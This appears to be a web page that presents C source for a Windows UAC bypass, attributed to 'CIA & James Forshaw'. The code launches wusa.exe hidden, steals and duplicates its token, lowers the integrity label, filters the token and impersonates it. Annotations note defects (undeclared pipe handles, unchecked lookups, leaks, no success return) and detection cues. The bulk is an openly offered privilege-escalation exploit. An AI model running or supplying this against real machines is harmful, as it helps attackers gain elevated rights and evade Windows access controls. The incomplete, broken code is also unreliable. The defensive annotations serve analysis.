UAC bypass implementation
This is an implementation of a UAC bypass method (authors: CIA & James Forshaw).
Works from Windows 7 to the latest Windows 10 Fall Creators Update. Code:
/*
 * StepOverUAC - proof-of-concept token-manipulation sequence (Windows-only).
 *
 * As written, the function: creates two inheritable anonymous pipes, resolves
 * three ntdll exports by name, launches "wusa.exe" hidden via ShellExecuteEx,
 * opens that process's token, terminates the process, duplicates the token
 * as a primary token, lowers its integrity label to Medium via
 * NtSetInformationToken, runs it through NtFilterToken, and finally
 * impersonates the filtered token.
 *
 * Not defined on this page (must come from elsewhere in the file):
 *   - the pipe handles inRead/inWrite/outRead/outWrite (file scope, presumably)
 *   - the function-pointer typedefs NtSetInformationToken, RtlLengthSid,
 *     NtFilterToken
 *
 * Return: 0 on any failed API call. NOTE(review): the success path falls off
 * the end of a non-void function without a return statement — that is
 * undefined behaviour in C and callers cannot distinguish success from
 * failure. Every early return also leaks whatever was acquired so far
 * (pipe handles, shinfo.hProcess, hProcessToken, hNewToken, filterToken, and
 * pIntegritySid, which is never released with FreeSid).
 *
 * Defensive notes for anyone analysing this sample: the observable footprint
 * is a medium-integrity process starting wusa.exe with no arguments and
 * terminating it almost immediately after opening its token, followed by
 * token duplication/filtering in the parent. Those are the events worth
 * alerting on. The page claims the technique works through Windows 10 Fall
 * Creators Update; do not assume it applies to other builds without
 * confirming.
 */
int StepOverUAC() {
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.bInheritHandle = TRUE;   /* pipes are created inheritable */
    sa.lpSecurityDescriptor = NULL;
    /* inRead/inWrite/outRead/outWrite are not declared in this function;
     * neither pipe is used anywhere in the body shown. */
    if (!CreatePipe(&inRead, &inWrite, &sa, 0)) return 0;
    if (!CreatePipe(&outRead, &outWrite, &sa, 0)) return 0;
    /* Native API lookups. None of the three results is NULL-checked; a failed
     * GetProcAddress would be called through as a null function pointer
     * below. RtlLengthSid ("rts") is resolved but never used. */
    NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
    RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");
    NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
    /* Unused locals: Error, bytesIO, hTest, bCond, sh, ptml, si, si2, pi,
     * pi2, szBuffer — left over from a larger routine, presumably. */
    DWORD Error, bytesIO;
    NTSTATUS Status;
    HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
    HANDLE filterToken = NULL;
    BOOL bCond = FALSE;
    SHELLEXECUTEINFO shinfo, sh;
    SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
    TOKEN_MANDATORY_LABEL tml, *ptml;
    PSID pIntegritySid = NULL;
    STARTUPINFO si, si2;
    PROCESS_INFORMATION pi, pi2;
    WCHAR szBuffer[MAX_PATH];
    /* Launch wusa.exe hidden; SEE_MASK_NOCLOSEPROCESS keeps shinfo.hProcess
     * open so its token can be read below. The handle is never closed. */
    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
    shinfo.cbSize = sizeof(shinfo);
    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
    shinfo.lpFile = L"wusa.exe";
    shinfo.nShow = SW_HIDE;
    if (!ShellExecuteEx(&shinfo)) return 0;
    /* Token is requested with MAXIMUM_ALLOWED rather than a specific mask. */
    if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken)) return 0;
    /* The child is killed as soon as its token has been opened. Both -1
     * arguments are implicitly converted: to a UINT exit code here, and to
     * a DWORD timeout (INFINITE) on the next line. Neither return value is
     * checked. */
    TerminateProcess(shinfo.hProcess, -1);
    WaitForSingleObject(shinfo.hProcess, -1);
    /* Make a primary token copy with TOKEN_ALL_ACCESS. */
    if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) return 0;
    /* Build the Medium mandatory-label SID and stamp it on the duplicate.
     * pIntegritySid is never released (FreeSid) on any path. */
    if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid)) return 0;
    tml.Label.Attributes = SE_GROUP_INTEGRITY;
    tml.Label.Sid = pIntegritySid;
    Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
    if (!NT_SUCCESS(Status)) return 0;
    /* NtFilterToken with the flag value 0x4 (presumably the documented
     * LUA_TOKEN restriction flag — confirm against winnt.h). The NTSTATUS is
     * discarded, so filterToken may still be NULL when passed on. */
    filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
    if (!ImpersonateLoggedOnUser(filterToken)) return 0;
    /* NOTE(review): no return value on the success path (see header). */
}